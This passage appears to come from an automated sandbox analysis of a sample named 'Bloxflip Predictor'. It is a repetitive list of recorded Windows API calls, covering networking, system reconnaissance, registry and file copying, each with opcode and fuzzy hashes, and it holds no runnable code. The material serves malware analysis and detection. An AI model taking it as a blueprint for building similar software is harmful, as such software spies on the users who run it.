                                            • Instruction Fuzzy Hash: EA11B671500204AFEB21CF51CC44FA6F7ECEF68714F04845AE9499B641E774E548CAB5
                                            APIs
                                            • K32EnumProcessModules.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2D06
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EnumModulesProcess
                                            • String ID:
                                            • API String ID: 1082081703-0
                                            • Opcode ID: aea14a9a9c0da21c0f29b7abbd42d4740416e48b56bc0a079a25ea722854bdd6
                                            • Instruction ID: fea2a398e154d05c9193bd2a1d9c7de6e856989c7114dbc3ad3efae45645de7d
                                            • Opcode Fuzzy Hash: aea14a9a9c0da21c0f29b7abbd42d4740416e48b56bc0a079a25ea722854bdd6
                                            • Instruction Fuzzy Hash: 6E11E276500204AFEB21CF54DC44FA6BBECEF24724F04846AEA49CB651D770E4088BB1
                                            APIs
                                            • SetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4DB3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            • Opcode ID: 95954b1172fadde32c6a126de21fe8faa8951fb00a373612776ebd78d98c54b9
                                            • Instruction ID: 779160da388199965a02edb5f55b2e5368b70c2d6bdb8f1ce79147dab273b467
                                            • Opcode Fuzzy Hash: 95954b1172fadde32c6a126de21fe8faa8951fb00a373612776ebd78d98c54b9
                                            • Instruction Fuzzy Hash: E711C4B2500204AFEB21CF15DC45FAABBE8EF15728F04846AED49CB681D774E4088BB5
                                            APIs
                                            • GetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4CCF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            • Opcode ID: 95954b1172fadde32c6a126de21fe8faa8951fb00a373612776ebd78d98c54b9
                                            • Instruction ID: 434905b017c1e8993666625dcd3f3a4ad5e02a6925680ed064805a291f07bc5d
                                            • Opcode Fuzzy Hash: 95954b1172fadde32c6a126de21fe8faa8951fb00a373612776ebd78d98c54b9
                                            • Instruction Fuzzy Hash: 9411B2B1500204AFEB21CF55DC45FA6B7A8EF14724F18846AED499B781D774E408CAB5
                                            APIs
                                            • GetExitCodeProcess.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4BF0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CodeExitProcess
                                            • String ID:
                                            • API String ID: 3861947596-0
                                            • Opcode ID: 11d403e915c772f555c109cbca1a35619800dbdf55498af8431432fcc7ddc343
                                            • Instruction ID: a7eaeb20e662ecbb4e705056e4f38ee066a39edd45c9f87c4cf5d3039e8abf6e
                                            • Opcode Fuzzy Hash: 11d403e915c772f555c109cbca1a35619800dbdf55498af8431432fcc7ddc343
                                            • Instruction Fuzzy Hash: F011E371500204AFEB21CF15DC45BAAB7ECEF14724F0484AAED49DB681D774E4088AB1
                                            APIs
                                            • ReadFile.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0925
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: b37fb7b09fb0bca9e0f61cec719292f2eab52ef53fea91fcb6ab8b9ce8c2d043
                                            • Instruction ID: 721028059fbfa7aa223aab11f5c2c50994126e57bfc3f2ec77d897b93c5ba1b3
                                            • Opcode Fuzzy Hash: b37fb7b09fb0bca9e0f61cec719292f2eab52ef53fea91fcb6ab8b9ce8c2d043
                                            • Instruction Fuzzy Hash: 9311E372500204AFEB21CF51DC44FA6FBE8EF68724F08845AEE499B651D3B5E408CBB1
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3CAA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            • Opcode ID: 5c9aa1b24b05a35370b8ffc8c593817a17953e6f838284376cee9b82ec9855a5
                                            • Instruction ID: bda33e0424c3b8965ab19dc8b08d6f42a11775d32461ea18415159af4a65717f
                                            • Opcode Fuzzy Hash: 5c9aa1b24b05a35370b8ffc8c593817a17953e6f838284376cee9b82ec9855a5
                                            • Instruction Fuzzy Hash: E711C171504204AFEB21CF51DD44FA6FBE8EF28724F18885AED499B641D375E408CAB2
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05EE3FBE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b82110736d2e9a10e2e24ef8e8e51c513467f5a9cc17198712d120b9d891b85c
                                            • Instruction ID: a69720631068fbfffc45d3c9d88784e74163e223547bde284ebb4e6df1b8c5ce
                                            • Opcode Fuzzy Hash: b82110736d2e9a10e2e24ef8e8e51c513467f5a9cc17198712d120b9d891b85c
                                            • Instruction Fuzzy Hash: B5117F31409380AFDB228F65DC44A52FFF4EF4A320F0888DEED858B562C275A419DB61
                                            APIs
                                            • ioctlsocket.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE188F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: 9fbcc123aa9b958ce2183f7067ef6a8355481927c3a927f3d40faffdfada0d23
                                            • Instruction ID: 9b3bdcebcdd093848464d5313e92f9858d278c3eee45d6adeca71e4d622453a6
                                            • Opcode Fuzzy Hash: 9fbcc123aa9b958ce2183f7067ef6a8355481927c3a927f3d40faffdfada0d23
                                            • Instruction Fuzzy Hash: DA11A371500204AFEB21CF51DC44FA6FBE8EF64724F1884AAED499B641D774E448CBB5
                                            APIs
                                            • shutdown.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE14D8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: shutdown
                                            • String ID:
                                            • API String ID: 2510479042-0
                                            • Opcode ID: 16e0f6e5f5e1378c9f0673074eb84e84758ff95891ae379f7fcabff1e3eeb9f8
                                            • Instruction ID: ceb3761778e6687003be6b5db8749a9fb5ffd887192bc5f5607c7a96a6363041
                                            • Opcode Fuzzy Hash: 16e0f6e5f5e1378c9f0673074eb84e84758ff95891ae379f7fcabff1e3eeb9f8
                                            • Instruction Fuzzy Hash: 7711C271500204AFEB21CF11DC44FA6BBECEF14728F18849AED499B741D774E548CAB1
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,00000E24), ref: 05EE024B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 85d37b0373446a5acf06253f4440d942fe028999584324e9047489716e3782d9
                                            • Instruction ID: 10e947aa715b69642fcd40b88d46275c2ba595ec6eadf3fe99104328e86eb37a
                                            • Opcode Fuzzy Hash: 85d37b0373446a5acf06253f4440d942fe028999584324e9047489716e3782d9
                                            • Instruction Fuzzy Hash: 1611E571510204AFEB21CB11DC45FB6F7E8DF59724F188099EE485A782D2B4F548CAB6
                                            APIs
                                            • GetAdaptersAddresses.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2871
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdaptersAddresses
                                            • String ID:
                                            • API String ID: 2506852604-0
                                            • Opcode ID: dec160bf6c4e7a32a7bf1fcdd3a9da99dd42d73e1917de653d861c4fc6c227a2
                                            • Instruction ID: 805d256b27bd810e1b64855232cac1f566ee1aa7873d8645426198dddb94d831
                                            • Opcode Fuzzy Hash: dec160bf6c4e7a32a7bf1fcdd3a9da99dd42d73e1917de653d861c4fc6c227a2
                                            • Instruction Fuzzy Hash: 5411C276500604AFEB218F11DC44FA6FBECEF28724F08849AEE855A651D775E408CAB5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction ID: cd2dd2c8fb8fabd8f99b7f17ad2574f53b9e78759468cbe02889d87671869b68
                                            • Opcode Fuzzy Hash: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction Fuzzy Hash: 82113D756143449FEB20CF55D884FA2FBE8EF09614F0888AADD89CB662D370F548CB61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction ID: 2b680fbc8a8397339b813d1a5821f5e32dff84805f5e9f0b744160596a4b6d92
                                            • Opcode Fuzzy Hash: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction Fuzzy Hash: E91151756142049FEF20CF15D884FA6FBE9EF04624F0884AADD89CB696E375E448CB71
                                            APIs
                                            • RasConnectionNotificationW.RASAPI32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1C2F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionNotification
                                            • String ID:
                                            • API String ID: 1402429939-0
                                            • Opcode ID: e2860e9c5ada4a8d8043b40bc5dad2fb471615f0ac7d83153aa68b9ad84a37af
                                            • Instruction ID: 1cba917a679d006a7ca990980311f60e72e87dee8bec5e215545bbb418139039
                                            • Opcode Fuzzy Hash: e2860e9c5ada4a8d8043b40bc5dad2fb471615f0ac7d83153aa68b9ad84a37af
                                            • Instruction Fuzzy Hash: A311E171500204AFEB21CF01DC84FA6FBA8EF24724F08849AED499B741D375E448CAB6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 87c72bb140b96791939887365a964cf99faa5e13489d134891799d1bfcc4c263
                                            • Instruction ID: 413be2be9e2576595f300d0ab149df4f2d9cba185fe3ece47d38239d78c65966
                                            • Opcode Fuzzy Hash: 87c72bb140b96791939887365a964cf99faa5e13489d134891799d1bfcc4c263
                                            • Instruction Fuzzy Hash: 89118F71549380AFDB22CF15DC44B52FFB4EF4A224F0884DEED858B552D275A418CB62
                                            APIs
                                            • GetNetworkParams.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE23F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: NetworkParams
                                            • String ID:
                                            • API String ID: 2134775280-0
                                            • Opcode ID: 8a855bca4a04027c2aad90dca58c660f3c4ff5388c413cd6cb14cc4281c07789
                                            • Instruction ID: d97025af29039c83d70e5ea700a881f8fcfe991f75febb580ec674284f084c95
                                            • Opcode Fuzzy Hash: 8a855bca4a04027c2aad90dca58c660f3c4ff5388c413cd6cb14cc4281c07789
                                            • Instruction Fuzzy Hash: E201A175510204AFEB218F01DC85FA6F7ECEF28728F04809AEE489B741D674E5088AB5
                                            APIs
                                            • CopyFileW.KERNEL32(?,?,?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BB1E6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: a2e19c3a45570d0f400289412bab4100429c7d78ef9d97596b3778e0e62b54fc
                                            • Instruction ID: 22efa98de4b3d0a591cf0328da8c8e2f3b6ae96c1e7cd06f1547b26eaf57c02d
                                            • Opcode Fuzzy Hash: a2e19c3a45570d0f400289412bab4100429c7d78ef9d97596b3778e0e62b54fc
                                            • Instruction Fuzzy Hash: 0911C8716042408FEB24CF29D885BA6FBD8EF14220F08C4AADD09CBB42D334E404CB75
                                            APIs
                                            • GetFileType.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 0f64e16e14f6523d16702434dd2cb41abd76c33423162237d8365a0cac90ac80
                                            • Instruction ID: 72d5c2694cd8db41ec9d6b117f4b758de4c8d7ea80aaac29a54d6cfe609ea469
                                            • Opcode Fuzzy Hash: 0f64e16e14f6523d16702434dd2cb41abd76c33423162237d8365a0cac90ac80
                                            • Instruction Fuzzy Hash: 8901C071500204AFEB21CB12DC89FA6B7A8DF65724F08C09AED488BB41D6B4E4088AB5
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 011BB5B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: fa54089c8d3a6341f4dd5c9977667a8ad4d6717894fb7b2fff88315aa508b7ca
                                            • Instruction ID: 5dda868106f387d408dda0bac467f7441bcafd719a102207cb257661323eee33
                                            • Opcode Fuzzy Hash: fa54089c8d3a6341f4dd5c9977667a8ad4d6717894fb7b2fff88315aa508b7ca
                                            • Instruction Fuzzy Hash: 48115E715093849FDB22CF65DC84B52BFA4EF46320F0984DAED858F262D275A808CB62
                                            APIs
                                            • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05EE2932
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Connect
                                            • String ID:
                                            • API String ID: 3144859779-0
                                            • Opcode ID: 9b7235b5a7678c5775d8bc682e6b31ca6075f75dfee1e28cc8f871b72cb977ca
                                            • Instruction ID: feb345cb9002989275546688fd703907d60aab81a1fc60ae1dd4ef9e6e80de84
                                            • Opcode Fuzzy Hash: 9b7235b5a7678c5775d8bc682e6b31ca6075f75dfee1e28cc8f871b72cb977ca
                                            • Instruction Fuzzy Hash: D41182355006449FDB20CF55D844B62FBE9FF08314F08D49AEE899B661D332E418DF61
                                            APIs
                                            • SetErrorMode.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BAB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 0fd946c6f596ffaddd5bb05de7e502433bb135c6174ed7c5d8447f54348f0c52
                                            • Instruction ID: e91d2299c7c0867704eaf15ffbb23402ffb4bce1fd4a1500b45e470bbfeca597
                                            • Opcode Fuzzy Hash: 0fd946c6f596ffaddd5bb05de7e502433bb135c6174ed7c5d8447f54348f0c52
                                            • Instruction Fuzzy Hash: F61188715093C4AFD7128B15DD44B62FFB4DF46624F0C84DAED854B253D275A808CB72
                                            APIs
                                            • GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 05EE1A9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationVolume
                                            • String ID:
                                            • API String ID: 2039140958-0
                                            • Opcode ID: 79429dcba87639254803657dcec28d5ccee6f06fd0c4b1d001ac6d72b12ec89f
                                            • Instruction ID: 7365e86da40ee39e3a0cda4963bedbf9ea70fab53a6390e239d8c6f1a1988ce6
                                            • Opcode Fuzzy Hash: 79429dcba87639254803657dcec28d5ccee6f06fd0c4b1d001ac6d72b12ec89f
                                            • Instruction Fuzzy Hash: B2019E71640205ABD310DF16CC45B66FBE8EB88A20F14815AED089B742D731F915CBE1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05EE3FBE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b814a13419067c91b6ab49e8eba62acb31329a72a2b24dfa38d52edbc6ebdc46
                                            • Instruction ID: 805f2e59542c9fb8597cad9416f8951c8441b8b27e793e6d407bac21ead70cbd
                                            • Opcode Fuzzy Hash: b814a13419067c91b6ab49e8eba62acb31329a72a2b24dfa38d52edbc6ebdc46
                                            • Instruction Fuzzy Hash: 05016D329106409FDB21CF55D845BA2FBF5EF48324F08889AEE894B652D376F418DF62
                                            APIs
                                            • RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05EE0B92
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionsEnum
                                            • String ID:
                                            • API String ID: 3832085198-0
                                            • Opcode ID: 2c6ea8fe51cec817b393bbaba87c9b457bf8979b69ea28be7642efa8df46decf
                                            • Instruction ID: 73cc282f0266d3607714f55745a6eab70bcc8e156d5b29dff0ad512c66b8a4a5
                                            • Opcode Fuzzy Hash: 2c6ea8fe51cec817b393bbaba87c9b457bf8979b69ea28be7642efa8df46decf
                                            • Instruction Fuzzy Hash: 0D01A271540205ABD310DF16CC46B66FBE8FF98A20F14815AED089BB41D731F915CBE5
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 05EE0ABE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 8a1ac2c0712907aa4b2e7bc474c136a93fb3623912bbd7cb175d2d2271e3baf8
                                            • Instruction ID: 976354c29d00fb399551f536d0e238d232832cea122f73304b9a96849f7279b1
                                            • Opcode Fuzzy Hash: 8a1ac2c0712907aa4b2e7bc474c136a93fb3623912bbd7cb175d2d2271e3baf8
                                            • Instruction Fuzzy Hash: AF01A271540205ABD310DF16CC46B66FBE8FF98A20F14815AED089BB42D771F915CBE5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 4da9920f38b08306c4ebe307301a79c1f9f14a69ff0f3d57687d7487f8e80180
                                            • Instruction ID: fe68b28882c25d0cfe2e67230b598e5f8680f4a6a8e3d624c9e5ef1a942eead3
                                            • Opcode Fuzzy Hash: 4da9920f38b08306c4ebe307301a79c1f9f14a69ff0f3d57687d7487f8e80180
                                            • Instruction Fuzzy Hash: BD01BC319002409FDB64CF55E884BA2FBE4EF08324F08C4AADE498B652D375E408CFB2
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 011BB5B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: b503d382716a74ee4b7ff10f05d9e8500ae4bc9c2a7046379d33e82901f24397
                                            • Instruction ID: 317529bc18dad1ccdaddfea60a619ce8c81fa9465bf79fff2e3b0c4d5bc88ab2
                                            • Opcode Fuzzy Hash: b503d382716a74ee4b7ff10f05d9e8500ae4bc9c2a7046379d33e82901f24397
                                            • Instruction Fuzzy Hash: 7E018B719082449FDB24CF15D884BA6FBE4EF05320F08C4AADD498F652D375E408CAA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: ee2cefc9549ba1d1d3d676310eb3ce18a26259c66d79ea45d95186e3852384de
                                            • Instruction ID: c72d02e1e68c4923d5b46da5e777bd9a30f7823fa3642e77ea34ee1998d79dbb
                                            • Opcode Fuzzy Hash: ee2cefc9549ba1d1d3d676310eb3ce18a26259c66d79ea45d95186e3852384de
                                            • Instruction Fuzzy Hash: 0E01AD719042449FDB24CF15E8887A2FBE4EF05220F08C4AADD498F342D379E408CEA2
                                            APIs
                                            • SetErrorMode.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BAB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: f87695ce071dc3420a22af2674232c9fbf3a55c6d0b2371ef75c0ca9a4747eb4
                                            • Instruction ID: 2d723a23e4a3c619b905a440e9f0fecf13d0e8b7eaf79ea34f6404cc050fd6e0
                                            • Opcode Fuzzy Hash: f87695ce071dc3420a22af2674232c9fbf3a55c6d0b2371ef75c0ca9a4747eb4
                                            • Instruction Fuzzy Hash: A1F0A9759042449FDB248F0AE985BA2FBE4EF05320F08C4DADD494B752D3B9E408CEA2
                                            APIs
                                            • CloseHandle.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BA290
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 33a0fc8432bea136b1820e3ea30af1edc7de57f4353ab044739d10f225cfc7a4
                                            • Instruction ID: c5d5568b8bd457a391ee61ab149ea0cde67a1e4d345980395abb2296d8c8fb08
                                            • Opcode Fuzzy Hash: 33a0fc8432bea136b1820e3ea30af1edc7de57f4353ab044739d10f225cfc7a4
                                            • Instruction Fuzzy Hash: 1611A3715093C4AFDB128B25DC95B52BFA8DF46220F0884DBED858F653D275A808CB62
                                            APIs
                                            • CloseHandle.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BA290
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 10ce599b0bdf9cd255a37203f36bc2578981a381909d59428521cd72bab8c4f0
                                            • Instruction ID: c0e353354d28ea76553f1f3658c49fb464a82a063a5fd7efb39c7e1d012afc65
                                            • Opcode Fuzzy Hash: 10ce599b0bdf9cd255a37203f36bc2578981a381909d59428521cd72bab8c4f0
                                            • Instruction Fuzzy Hash: F5018F71A042449FDB64CF59E8857A6FBE4DF05220F08C4EADD498F756D375E408CEA2
                                            Memory Dump Source
